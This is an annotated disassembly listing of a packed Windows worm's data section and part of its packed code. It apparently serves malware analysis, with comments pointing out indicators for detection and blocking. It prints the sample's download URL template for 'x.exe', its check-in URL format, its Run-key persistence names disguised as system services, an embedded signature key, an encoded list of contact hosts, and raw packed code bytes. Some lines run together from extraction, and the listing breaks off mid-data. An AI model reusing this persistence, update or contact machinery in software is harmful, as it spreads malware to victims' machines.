; routine that references aUterm13 above.  Their use (object names or
; markers) is not visible in this view — confirm in sub_31001E06.
aU12            db 'u12',0              ; DATA XREF: sub_31001E06+8Do
aU11            db 'u11',0              ; DATA XREF: sub_31001E06+81o
aU10            db 'u10',0              ; DATA XREF: sub_31001E06+75o
aU9             db 'u9',0               ; DATA XREF: sub_31001E06+69o
        align 4
aU8             db 'u8',0               ; DATA XREF: sub_31001E06+5Do
        align 10h
aU12x           db 'u12x',0             ; DATA XREF: sub_31001E06+51o
        align 4
aU11x           db 'u11x',0             ; DATA XREF: sub_31001E06+45o
        align 10h
aU10x           db 'u10x',0             ; DATA XREF: sub_31001E06+3Bo
        align 4
aU13x           db 'u13x',0             ; DATA XREF: sub_31001E06+22o
        align 10h
; URL template used by sub_310020F4 (host and port filled in at runtime) —
; the "/x.exe" path is a usable network indicator.
aHttpSDX_exe    db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_310020F4+2Do
        align 4
; Autostart key: referenced by sub_31001C18 and sub_310023C8.  Both take
; aWindowsUpdate / the names at sub_310023C8 immediately before it, so those
; are presumably the value names written or removed under this key — confirm
; in those routines.  Checking this key for the names below is the obvious
; host-side detection.
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
                                        ; DATA XREF: sub_31001C18+23o
                                        ; sub_310023C8+5Fo ...
        align 4
aWindowsUpdate  db 'Windows Update',0   ; DATA XREF: sub_31001C18+1Co
                                        ; sub_31002476+87o ...
        align 4
; Fixed identifier: the "id=%s" field of the check-in URL built by
; sub_31002A44, and also referenced by sub_31002542 next to the
; Software\Microsoft\Wireless strings below.
aDfashnzdsdl    db 'dfashnzdsdl',0      ; DATA XREF: sub_31002542+57o
                                        ; sub_31002542+8Ao ...
        dd 3 dup(0)                     ; padding
; Registry location used by sub_31002542 (key, value names "Client"/"ID",
; string "1").  sub_31002542 also references aDfashnzdsdl above, so this is
; presumably where an instance identifier is stored — confirm there.
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31002542+32o
aClient         db 'Client',0           ; DATA XREF: sub_31002542+BCo
                                        ; sub_31002542+F8o
        align 10h
aId             db 'ID',0               ; DATA XREF: sub_31002542+37o
                                        ; sub_31002542+75o
        align 4
; The eleven names below are referenced only from sub_310023C8, in sequence
; (+4E down to +F), which also references the Run key aSoftwareMicros (+5F).
; They read like autostart value names and two process/file names
; (avserve.exe, avserve2.exe); whether sub_310023C8 creates, looks up or
; deletes them (RegDeleteValueA is imported) is not visible here.  Either
; way they are worth matching under the Run key.
aMsConfigV13    db 'MS Config v13',0    ; DATA XREF: sub_310023C8+4Eo
        align 4
; IDA shows one string here; the +47 reference may point inside it.
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_310023C8+47o
        align 10h
aAvserve_exe    db 'avserve.exe',0      ; DATA XREF: sub_310023C8+40o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_310023C8+39o
        align 4
aWinupdate      db 'WinUpdate',0        ; DATA XREF: sub_310023C8+32o
        align 10h
aSystray        db 'SysTray',0          ; DATA XREF: sub_310023C8+2Bo
aBotLoader      db 'Bot Loader',0       ; DATA XREF: sub_310023C8+24o
        align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_310023C8+1Do
        align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_310023C8+16o
        align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_310023C8+Fo
        align 4
; Wide "\" path separator (sub_31002476, sub_310026A6) and wide "1"
; (sub_31002542).
asc_31004CAC:                           ; DATA XREF: sub_31002476+56o
                                        ; sub_310026A6+49o
        unicode 0, <\>,0
a1:                                     ; DATA XREF: sub_31002542+B7o
        unicode 0, <1>,0
; Embedded CryptoAPI public key, 44h (68) bytes — the size sub_31002928
; passes to sub_31001190:
;   BLOBHEADER  206h     -> bType = 6 (PUBLICKEYBLOB), bVersion = 2, reserved = 0
;               2400h    -> aiKeyAlg = CALG_RSA_SIGN
;   RSAPUBKEY   31415352h -> magic "RSA1"
;               180h     -> bitlen = 384
;               10001h   -> pubexp = 65537
;   modulus     12 dwords = 48 bytes (little-endian)
; A 384-bit RSA signature key is the same length as the 30h-byte field
; sub_31002928 checks, which is what ties the two together.
dword_31004CB4  dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h ; DATA XREF: sub_31002928+B9o
        dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
        dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
; Response marker scanned for by sub_31002A44 (a second copy, aZer0, is
; used by sub_31002928).
aZer0_0         db 'zer0',0             ; DATA XREF: sub_31002A44+BFo
        align 10h
; Fixed User-Agent sent by sub_31002A44.
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
                                        ; DATA XREF: sub_31002A44+84o
        align 4
; Host table consumed by the loop at loc_31002B40: 5-byte entries
; { byte flag (full check-in when non-zero), dword pointer to a host string }.
; IDA only typed the first entry; the remaining entries are the raw db/dd
; bytes that follow, with pointers descending from 31004ED0 to 31004DA4
; (roughly 22 entries up to the two zero pad bytes before 68746566h).
; The host strings themselves follow as little-endian ASCII in the dd lines
; below, e.g. the dwords at 31004DA4 (68746566h, 2E647261h, 7A6962h) spell
; "fethard.biz".  Decoding the rest gives the full contact list for blocking.
byte_31004D34   db 1                    ; DATA XREF: UPX0:31002B45r
off_31004D35    dd offset dword_31004ED0 ; DATA XREF: UPX0:31002B4Dr
        db 1, 0C0h, 4Eh
        dd 0B0013100h, 131004Eh, 31004EA0h, 4E8C00h, 4E7C0131h
        dd 6C013100h, 31004Eh, 31004E60h, 4E5401h, 4E440131h, 34003100h
        dd 131004Eh, 31004E28h, 4E1C01h, 4E100131h, 8013100h, 131004Eh
        dd 31004DF8h, 4DE801h, 4DD40131h, 0C4013100h, 131004Dh
        dd 31004DBCh, 4DB001h, 4DA40131h, 3100h, 68746566h, 2E647261h
        dd 7A6962h, 6B636168h, 2E737265h, 766Ch, 2E767663h, 7572h
        dd 2E777777h, 6C646572h, 2E656E69h, 7572h, 69766F6Ch, 646F676Eh
        dd 736F682Eh, 6B732E74h, 0
        dd 656C6966h, 72616573h, 722E6863h, 75h, 646C6F67h, 61736E65h
        dd 722E646Eh, 75h, 6B637566h, 75722Eh, 6F646170h, 2E696B6Eh
        dd 67726Fh, 6A6F7274h, 722E6E61h, 75h, 63657361h, 2E616B68h
        dd 7572h, 7473616Dh, 782D7265h, 6D6F632Eh, 0
        dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 722E7A61h
        dd 75h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
        dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
        dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
        dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
        dd 75722E6Bh, 0
        dd 72617778h, 6A632E65h, 656E2E62h, 74h
; Last host string (the first table entry points here).  The extraction fused
; the following label onto the last value; the tokens are left as found.
dword_31004ED0  dd 617A616Dh, 616B6166h, 75722EhaMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_310026A6+13o
        align 10h
; Alphabets used by sub_3100281C; sub_31002928 hands a letter value (0..25)
; to sub_310028A1, so a letter-shift helper is likely — not visible here.
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_3100281C+1Co
        align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_3100281C+Co
        align 4
aZer0           db 'zer0',0             ; DATA XREF: sub_31002928+Bo
        align 10h
; URL formats for sub_31002A44: the bare form, and the full check-in form
; whose fields are host, "dfashnzdsdl", dword_31004FD4, dword_31004FBC and
; the abbreviated country name.  Parameters are separated by '?' not '&'.
aHttpS          db 'http://%s',0        ; DATA XREF: sub_31002A44+71o
        align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s?scn=%d?inf=%d?ver=13?cnt=%s',0
                                        ; DATA XREF: sub_31002A44+57o
        align 4
        dd 9 dup(0)
; Writable globals.  Only the cross-references are visible here; the two
; that feed the check-in URL are dword_31004FD4 ("scn") and dword_31004FBC
; ("inf").  dword_31004FD0 is initialised to the image base.
dword_31004FB8  dd 0                    ; sub_31001C18+80w
dword_31004FBC  dd 0                    ; sub_31002A44+43r  (inf=%d)
dword_31004FC0  dd 0                    ; sub_31001ADF:loc_31001B8Dr ...
dword_31004FC4  dd 0                    ; UPX0:31001DB0w ...
dword_31004FC8  dd 0                    ; sub_31001E06+33w
dword_31004FCC  dd 0                    ; sub_310020F4+20r
dword_31004FD0  dd 31000000h            ; UPX0:31001D95w  (image base)
dword_31004FD4  dd 0                    ; sub_3100202D+53o ...  (scn=%d)
dword_31004FD8  dd 0                    ; UPX0:310021A3w
word_31004FDC   dw 0                    ; DATA XREF: sub_31001F41+3Br
                                        ; sub_31001FA5:loc_31002006r ...
        align 10h
dword_31004FE0  dd 0                    ; sub_31002542+110w
        align 20h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31005000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31005000 dd 0C4h, 40h, 74654701h, 61636F4Ch, 6E49656Ch, 416F66h ; DATA XREF: UPX1:31006AD1o dd 69725701h, 69466574h, 100656Ch, 74726956h, 466C6175h dd 656572h, 72695601h, 6C617574h, 6F6C6C41h, 47010063h dd 6F4D7465h, 656C7564h, 656C6946h, 656D614Eh, 6C010041h dd 63727473h, 4169706Dh, 65470100h, 73795374h, 446D6574h dd 63657269h, 79726F74h, 6C010041h, 63727473h, 417461h dd 706F4301h, 6C694679h, 1004165h, 456E6957h, 636578h dd 65724301h, 54657461h, 686C6F6Fh, 33706C65h, 616E5332h dd 6F687370h, 50010074h, 65636F72h, 32337373h, 73726946h dd 54010074h, 696D7265h, 6574616Eh, 636F7250h, 737365h dd 6F725001h, 73736563h, 654E3233h, 1007478h, 7274736Ch dd 41797063h, 736C0100h, 656C7274h, 100416Eh, 65656C53h dd 6C010070h, 63727473h, 416E7970h, 65470100h, 72754374h dd 746E6572h, 636F7250h, 737365h, 74654701h, 636F7250h dd 72646441h, 737365h, 616F4C01h, 62694C64h, 79726172h dd 57010041h, 65746972h, 636F7250h, 4D737365h, 726F6D65h dd 43010079h, 65736F6Ch, 646E6148h, 100656Ch, 6E65704Fh dd 636F7250h, 737365h, 74654701h, 75646F4Dh, 6148656Ch dd 656C646Eh, 47010041h, 69547465h, 6F436B63h, 746E75h dd 65724301h, 4D657461h, 78657475h, 43010041h, 74616572h dd 72685465h, 646165h, 65724301h, 50657461h, 65636F72h dd 417373h, 74655301h, 6E657645h, 4F010074h, 456E6570h dd 746E6576h, 45010041h, 54746978h, 61657268h, 52010064h dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h dd 72430100h, 65746165h, 656C6946h, 45010041h, 50746978h dd 65636F72h, 1007373h, 4C746547h, 45747361h, 726F7272h dd 65440100h, 6574656Ch, 656C6946h, 57010041h, 46746961h dd 6953726Fh, 656C676Eh, 656A624Fh, 1007463h, 
61657243h dd 76456574h, 41746E65h, 6E490100h, 6C726574h, 656B636Fh dd 636E4964h, 656D6572h, 746Eh, 0D1h, 0 dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h dd 4B74726Fh, 7965h, 0DEh, 0E8h, 6D656D01h, 706D63h, 72747301h dd 726863h, 78655F01h, 74706563h, 6E61685Fh, 72656C64h dd 73010033h, 74737274h, 72010072h, 646E61h, 61727301h dd 100646Eh, 636D656Dh, 1007970h, 6C727473h, 1006E65h dd 736D656Dh, 7465h, 0E9h, 110h, 6E694601h, 6E695764h dd 41776F64h, 65470100h, 726F4674h, 6F726765h, 57646E75h dd 6F646E69h, 47010077h, 69577465h, 776F646Eh, 65726854h dd 72506461h, 7365636Fh, 644973h, 70737701h, 746E6972h dd 4166h, 0F4h, 124h, 746E4901h, 656E7265h, 61655274h dd 6C694664h, 49010065h, 7265746Eh, 4F74656Eh, 556E6570h dd 416C72h, 746E4901h, 656E7265h, 65704F74h, 100416Eh dd 65746E49h, 74656E72h, 736F6C43h, 6E614865h, 656C64h dd 746E4901h, 656E7265h, 74654774h, 6E6E6F43h, 65746365h dd 61745364h, 6574h, 100h, 13Ch, 0FF0073FFh, 0DFF0002h dd 1FF00h, 0FF0039FFh, 34FF006Fh, 17FF00h, 0FF000CFFh dd 4FF0009h, 13FF00h, 0FF0010FFh, 3FF0016h, 0 dd 45500000h, 14C0000h, 87140002h, 40D0h, 0 dd 0E00000h, 10B010Fh, 24000006h, 10000000h, 0 dd 1D880000h, 10000000h, 40000000h, 0 dd 10003100h, 2000000h, 40000h, 0 dd 40000h, 0 dd 50000000h, 4000000h, 0 dd 20000h, 0 dd 10000010h, 0 dd 10000010h, 0 dd 100000h, 2 dup(0) dd 
2BF00000h, 8C0000h, 14h dup(0) dd 10000000h, 17C0000h, 6 dup(0) dd 742E0000h, 747865h, 23060000h, 10000000h, 24000000h dd 4000000h, 3 dup(0) dd 200000h, 642EE004h, 617461h, 0FE40000h, 40000000h, 10000000h dd 28000000h, 3 dup(0) dd 400000h, 4000C000h, 2DF80000h, 44B60000h, 274D0000h dd 0F2150DB6h, 0E113C4EBh, 0B2793772h, 68158743h, 68030B84h dd 166DAC80h, 2D2F8A6Bh, 0F4624753h, 4553EB31h, 9A17BC76h dd 8B3E3423h, 3038C8C2h, 0E1FB5701h, 58E73ED9h, 3604D0C9h dd 294BA468h, 0A95D0DEEh, 6806D1DBh, 1D89805Bh, 44B09FBCh dd 122776DBh, 0B314DF60h, 0B05DF2C7h, 5614DDADh, 27B5353h dd 80113A01h, 0D1FC735h, 0F029C804h, 1A40FE83h, 9A51B3ECh dd 0C4C02274h, 4C46C0A3h, 16FDE978h, 0F1A3597Ch, 5153FC97h dd 674B6249h, 0C03A796Bh, 0E126565Bh, 0EC3370FBh, 0C2580C5Eh dd 499AF810h, 0B35E69A8h, 0E80C3E56h, 5E93BFB7h, 0EC5D89h dd 0FF25FF05h, 0C33A041Fh, 0DD837FA1h, 7443CCA3h, 0CC8A12E7h dd 0DF74C984h, 0A3645E50h, 42EA26F4h, 154098F5h, 58C2DD32h dd 6E440C64h, 0F4D7D1FDh, 0D807F85Fh, 6891481Fh, 38501ADFh dd 0AF0867FBh, 0E2EB5959h, 455FCF53h, 97305987h, 70019043h dd 0EB36D0A1h, 0B0333C5Eh, 23E11D6h, 0F4C1E60Ah, 802DD6D9h dd 304526A0h, 0A3541B63h, 7CD4E0D0h, 603B19B0h, 1AC4A36Eh dd 0D9B73DD0h, 52C13B3Dh, 729CC45h, 0C41304C5h, 0BEC71C95h dd 6683E15h, 4D08131Eh, 0FD8D26A5h, 0B5FAEDAh, 6999020Eh dd 0D844C835h, 5834F0BBh, 6A26402Ch, 7F1180A1h, 0B2EAFF7Ah dd 0A1642BD0h, 8964508Ah, 0B36C0725h, 68C3C772h, 388F9758h dd 0AD816CDCh, 843A3D7h, 674BA8FCh, 7F603203h, 4C7AB0Ah dd 400B4824h, 9A40643Ch, 38860927h, 40643D34h, 592C3006h dd 0F07CC339h, 3974080Bh, 2C4B2468h, 60F7C590h, 4B1CB632h dd 0DEE1406h, 498485DBh, 0D0A280Ch, 0E49CBB58h, 1C187676h dd 400A9515h, 3521502Bh, 0C382267Ch, 14EDEE28h, 0D0FA43E3h dd 888618DDh, 0E3EB2A13h, 81618683h, 3DFF61B2h, 0F0BA3C0Fh dd 48204615h, 0E4270D67h, 47C2A80h, 2E7FA4D8h, 0B458A51h dd 0B0E1E92Dh, 32FFEB97h, 43A52DBh, 1CEFC895h, 3831BA5Fh dd 8825BA5Dh, 13FA0B5Dh, 0B70F5E02h, 0DD19FECFh, 59A4DC35h dd 0FEF7999Dh, 7352D603h, 0B2EDC3FEh, 0FB80FC65h, 5EBD72FFh dd 5F766248h, 
49ACEC99h, 6833F092h, 15B0D758h, 81084F0Eh dd 5DD40D0Ah, 36D99863h, 0E0530B09h, 92D90E75h, 0F75B771h dd 1F41680Ch, 0E93D89BAh, 32DADE41h, 0D703FF84h, 0B1FB8143h dd 50DBE4C6h, 875F9F17h, 9A030C5Dh, 737BB166h, 6FB3A2E8h dd 1DEF025Bh, 0FD73812Fh, 2DE6BD04h, 77FEFF9Eh, 0F7887F3Ch dd 62DB0E9Eh, 3B3123A3h, 3EAADC74h, 0C59D93B0h, 9E57A0A3h dd 0C89C572Fh, 57112CF6h, 0A51359F8h, 712B712Fh, 75B33CFFh dd 106873EEh, 64761E27h, 0BED3A60Dh, 70849ED3h, 60CB2C2h dd 4EDEA9AEh, 60E5AC60h, 508F5099h, 316D7A70h, 8078BA5Ah dd 0CF6F81DAh, 0BCCBB3Ch, 6068B003h, 35EABC4Bh, 111001B9h dd 266C40B5h, 8AC077D3h, 0DF0B80C6h, 0B3BC2CC7h, 5655C2C0h dd 0D4125793h, 63C343E6h, 0A5519402h, 0EC181F0Ch, 0F4FD30E0h dd 0E25314E3h, 3776CD5Bh, 6A020BF6h, 5DD83850h, 0E87105BAh dd 96D27FB5h, 9187400h, 0E13B8211h, 510AE60h, 4F001419h dd 7E1006D8h, 0F010B0A2h, 0D743EAAh, 0C420D553h, 51C73B62h dd 0DB399210h, 4C3C37D0h, 0ED3A1824h, 117EED85h, 2C202D26h dd 0EDB0EEDh, 96EF144Dh, 0F2EBA205h, 8324B716h, 0EB65750Dh dd 4C0B7BDDh, 3F680E94h, 11179C0Dh, 0C06460Bh, 2C382A15h dd 106EB3BEh, 51B01408h, 17470B65h, 7D5618B7h, 0B8C618B8h dd 3EF6B1B0h, 0DC743D56h, 676E962Ah, 18FC7516h, 10205014h dd 3C6B1718h, 6A030859h, 5A550F1Dh, 8BE2CED7h, 4D5662C6h dd 182C562Eh, 53CEC990h, 27005556h, 2C5ACE59h, 0C520AA6h dd 9262CF04h, 305D0C03h, 83EA0128h, 0DE5320C3h, 0EDE24EAFh dd 0F1B5E0Fh, 3CC2948Eh, 4E365C1Eh, 17ADF779h, 6785F07Ch dd 0C1A4AEE4h, 7ADE2592h, 0D8DB3568h, 0ECEC5F49h, 5C71082h dd 0C0865020h, 1BEEF134h, 8D477DDEh, 0FC1D1E74h, 0F178BFEFh dd 745278DEh, 0E0B5FF1Ch, 0F20B9B45h, 0FFFC646h, 7008521Fh dd 33361C35h, 76D84650h, 39E17BBDh, 38B78973h, 57D00F56h dd 239103C7h, 4C9076B7h, 7CD4062Ch, 723964D8h, 58DCC8E4h dd 44E450E0h, 47942CE8h, 20EC1C8Eh, 0F4F404F0h, 69A2794Bh dd 0A7DB032h, 16BEEBBFh, 80C4C2C7h, 0B7188B05h, 0C8A34497h dd 75F92EC8h, 0B06C107Dh, 1D2B0E17h, 9A2C0C90h, 8337354Ch dd 5F75B61Dh, 519C0761h, 74E4781Bh, 0EE98AD09h, 0D3D41887h dd 0E5636A88h, 9C09FE58h, 0A184435Dh, 3E0831Bh, 8705C083h dd 0D109D365h, 5CD00952h, 
86EEC2Ch, 8C1059B9h, 4CAC683Dh dd 0E661C30Ah, 140E26DCh, 0CEF1E138h, 6160D982h, 0CC20401Ch dd 0C8662CB7h, 30B9C6C6h, 0ACC59Bh, 125D4160h, 64146CFAh dd 73F01F4h, 20E7B7CCh, 0E8795E34h, 7CF45700h, 9F60C1FFh dd 501FC52Bh, 0BFB14C7h, 25D376E0h, 0E02D52E0h, 0BF501D6Ah dd 207A71CCh, 51F0E10Ch, 0FE37743Fh, 0AB907B94h, 1FB4BB0Ah dd 52D103B0h, 0B61D8B53h, 53EEF4C5h, 383D53BCh, 37EE6BC6h dd 590FEBB1h, 0D82532CEh, 78C8D9B2h, 65E28818h, 1C6F7596h dd 0B068BB26h, 46E8184Ch, 0CDC2372Eh, 14FEB9BBh, 915EEB72h dd 12C166A7h, 3310AB4Ch, 31B1BC24h, 0FD3BBBC6h, 90462D2Ch dd 7E0AE2Dh, 2D8D5948h, 15EB0CE4h, 9AF55960h, 93806472h dd 0EC0CD7CBh, 331EA783h, 7668CA4Ch, 0C674136Ah, 48115B38h dd 7BE010DDh, 57EFD4C9h, 0DC68CAE5h, 1B2CEC4Eh, 0BC7EA41Dh dd 0C0DE3BD8h, 0F0A86317h, 248CF1ECh, 2C3D8B4Bh, 9D9E3017h dd 0DD72211h, 710E066Ah, 8D7BC676h, 5C0F0584h, 0D1591C59h dd 598375ACh, 3026DD7h, 62B30114h, 0A740C5F2h, 0F00C3AD9h dd 0C8152080h, 1E289053h, 3BB5D827h, 0E7511C6h, 0A8C544A3h dd 517D03BBh, 57E800BFh, 780D1FDDh, 4859B0B4h, 9924FB53h dd 119F1DB1h, 0F8A756F4h, 2D443353h, 3C92C1BDh, 8A9C05AAh dd 5C938153h, 0EB9040F1h, 0C6D08B49h, 8702C77h, 7C04E78Bh dd 40FFCF83h, 7FF0086Ah, 171FFE3h, 8A59F92Bh, 0FF588A10h dd 0C1D90239h, 0E28004FAh, 0DD542A03h, 0F62FEDFEh, 0A02E3C0h dd 8AA588D3h, 188A0150h, 221ACAFEh, 6D6EEFD1h, 35716E9h dd 0F0E32319h, 4646161Ch, 30EE08Dh, 833714FEh, 0BF7C30FAh dd 0ED593817h, 27BC4FB7h, 122CBE59h, 0F30AE47Dh, 0A4A566A5h dd 816FF40Fh, 25C81091h, 0DB85100Ch, 2D237DA4h, 0C3A2BE95h dd 0D3BE0F1Ah, 0E438EC9Ch, 804D5AA5h, 0C8AF2357h, 6FF1BFB6h dd 0C12B1A38h, 99C30359h, 15448AD0h, 1F23EBE4h, 0E427C2C8h dd 0EBC8C840h, 83418A03h, 2AAC301Ah, 6EA50786h, 57107E37h dd 0BA84008Ah, 53618B4Ch, 46A1422Ch, 8A136E05h, 4FBEB1D8h dd 6041FD0Bh, 18180C08h, 47590788h, 0F6DF6138h, 7C59EDEDh dd 7F7A050Bh, 83F38C06h, 410A61EEh, 0FED75A0Fh, 4D4120DCh dd 5BBB7548h, 382A4B64h, 418045A8h, 0FF0B4EA5h, 8B0AB617h dd 0B60F040Eh, 0C2031114h, 3F98341h, 8E1633F0h, 0C28B3004h dd 25816122h, 3C994D70h, 0EDFA480Ah, 
942301EDh, 0FCF4C001h dd 0D968D6C9h, 0E90DFF80h, 0D008C183h, 0E0D038F1h, 50285D83h dd 6CCDE257h, 780D03Ch, 22A6A780h, 0E3BB9BE6h, 0F2261E8h dd 1E0BBA88h, 0B18D0F1Ah, 0EEBE59ABh, 317E6A47h, 0F6F04DECh dd 0E982569Bh, 1E8AF760h dd 5B268065h, 0B2F34C4h, 9DEABEA5h, 8DC4408Ah, 0FA6F0246h dd 1E88DFB9h, 0FBC1711h, 0BA041908h, 5B014638h, 0F1CB6811h dd 446A6175h, 1E4C1456h, 0CE15DD98h, 282D8C01h, 4D50306Ah dd 0C161B98Dh, 2A2F0DFFh, 2753D8F7h, 7DD0124Ch, 330F1B10h dd 0A27823F5h, 0DB24F159h, 0E042D059h, 5901E805h, 14F00885h dd 8512C200h, 3B443D18h, 9117076Ah, 566B140h, 3438C6EBh dd 1A0C3274h, 599B32Ch, 0D405BC72h, 0DA12D7C6h, 4F5CA0D1h dd 4AC08E79h, 13185CCDh, 0DD19BA2Dh, 0CF736B0h, 4D5F0053h dd 38D0D0Eh, 8DBF864Eh, 50515326h, 204A9264h, 0BEFB6575h dd 51A22000h, 0AC750C14h, 4EB40B8h, 0F8227F3Bh, 0D5B1354Ch dd 4BD26E05h, 7C4E4352h, 0BD3E8D48h, 0DF0309A1h, 7924196Ch dd 0BA0F8773h, 3230D68Dh, 0F6D64C59h, 8C5725FBh, 348F9ED6h dd 34B6848Ah, 5269914Dh, 0B6B4FD8Fh, 1A4B4D35h, 0FBD65940h dd 808A11FCh, 33C54EC4h, 93E0B9D2h, 2FFA9070h, 81F1F708h dd 61B48C2h, 0FE836800h, 2FF73646h, 0B6EBBA0Eh, 825FFCCh dd 40561h, 6E09E9BDh, 0EA51CCCCh, 1472E58Dh, 7A5BE981h dd 2D0BF7ECh, 17018504h, 812BEC73h, 6ECF0CC4h, 0E18B7A5Bh dd 0CA40768Bh, 10F043C3h, 2322A5E8h, 6C740563h, 8501502Bh dd 4F7Dh, 0B00A8A3Fh, 6858EB01h, 0CDFFEC74h, 3A7074FFh dd 32312F2Fh, 31302E37h, 3030383Ah, 652E652Fh, 0DF6578h dd 8FFEDFFFh, 697A6F4Dh, 2F616C6Ch, 5DDF2734h, 0B966C933h dd 758D01EEh, 0FFFD8B05h, 8AFEFB6Dh, 7993C06h, 302C0646h dd 88993446h, 0EDE24707h, 0DAE80AEBh, 2FFDFFBh, 65622E82h dd 93712E67h, 1201C999h, 0FD91BDFDh, 0BFDD0716h, 72C17FFFh dd 0FD42AA68h, 10FDAA66h, 0A91C14BAh, 0F3C91A98h, 8608F198h dd 6EC7FECFh, 10C07102h, 37CB5F90h, 1C965992h, 0E4143A78h dd 0EC3E4FB6h, 0A7D7157h, 0F345713Ah, 8904F19Dh, 0FBEE748Fh dd 9C04F109h, 67B34011h, 0B7BFE3F3h, 10F0F63Bh, 0B20BDC1Ch dd 0C99B6059h, 14D90125h, 0D8F63E59h, 0CA17A104h, 8D2B9E71h dd 0AD916168h, 1FD9F6B7h, 9666611Ah, 0B228111Dh, 9900C850h dd 0F6EFDC14h, 5557B6CFh, 
0A44E1225h, 491291C0h, 54F7ED99h dd 6FF67EEEh, 3AC41400h, 3B71CBCAh, 0E424FF1Ch, 0CDCF1A21h dd 0D9B64FCDh, 2C668FC3h, 0FB1E3F81h, 0DB37CEB0h, 0C383B8FDh dd 0A85D12CDh, 251DCBC9h, 3FB264ADh, 5A0B24D9h, 0C096A648h dd 0D9FB1B14h, 294CFF65h, 9CF3EBA7h, 3416E9BAh, 0F57126F4h dd 0ECFFFBBBh, 3BF90EFCh, 4629EF13h, 0DE5F376Bh, 0A8EC4766h dd 0F7B016AAh, 0B70137FFh, 0E9EDFFC5h, 0B7FDE9ECh, 12CE1FCh dd 87DDFEDFh, 0FCFCF5CAh, 0EBFCF25Ah, 0AAF5FCF7h, 34C7D6ABh dd 0FFB3AAF9h, 0B459FFF2h, 662A2A25h, 9093ACC9h, 9D90B781h dd 0CDC98363h, 10309271h, 0BFF85F76h, 14513519h, 720A95D9h dd 0C8712A91h, 0FFFDBFEBh, 12A5D27Fh, 9AE180D5h, 146FAA52h dd 0C89A2A8Dh, 9A8B12B9h, 5958474Ah, 0DB9BAB9Eh, 0DBEDFFFFh dd 0EC20A319h, 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h dd 0B0961FBDh, 2EFFFCD0h, 0D812EB8Dh, 125A9A85h, 5A9A099Dh dd 0D096F810h, 9FFBB6F6h, 7F664922h, 8712FEFDh, 95C25AA9h dd 82128502h, 0B5483F04h, 0CB5A91EDh, 85C7CFF7h, 424D53FFh dd 9F90BC8Fh, 0C8531872h, 62FEFFh, 0FFF1AD02h, 204350FFh dd 5754454Eh, 204B524Fh, 474F5250h, 204D4152h, 0FB17CD31h dd 4CF6B1FFh, 24D4E41h, 6E69570Ah, 73776F64h, 726F6620h dd 0D6035720h, 6B7F6D2Dh, 756F7267h, 1A330E70h, 234D2761h dd 0E96C3E5Eh, 32215832h, 312E3232h, 7920544Eh, 18DA6B06h dd 8B323C20h, 44BB73A4h, 0BA07192Bh, 23FF0Ch, 7D8363h dd 140A1104h, 1FD40520h, 0D6ED6F5h, 4B4C0069h, 27505353h dd 0CA76FF97h, 0E00882EAh, 24005792h, 64006Eh, 0B777006Fh dd 0DCDB17h, 30743A73h, 398C0901h, 25B73000h, 1D2335B2h dd 0C800072Eh, 0DA1B2273h, 0DA2008ABh, 0C9324CDh, 1039F57h dd 758360C8h, 47234601h, 73FF4007h, 60F23h, 1F011006h dd 0E0888A15h, 0E8B70048h, 4FE5FFh, 6A198144h, 49E4F27Ah dd 30AF281Ch, 215367B3h, 0E16044DFh, 6B75DF5Ch, 304F2DAEh dd 75C0400h, 8D085ABDh, 5CAF75DCh, 72E4D61h, 2E380036h dd 8DDB7BAFh, 491B3077h, 43EC00h, 3F3B24h, 61CF201Fh, 8A26463h dd 0E41E04DCh, 16402DBFh, 0DEDE00FFh, 16000E00h, 3702019Fh dd 26C24261h, 0DE192840h, 3EFB868h, 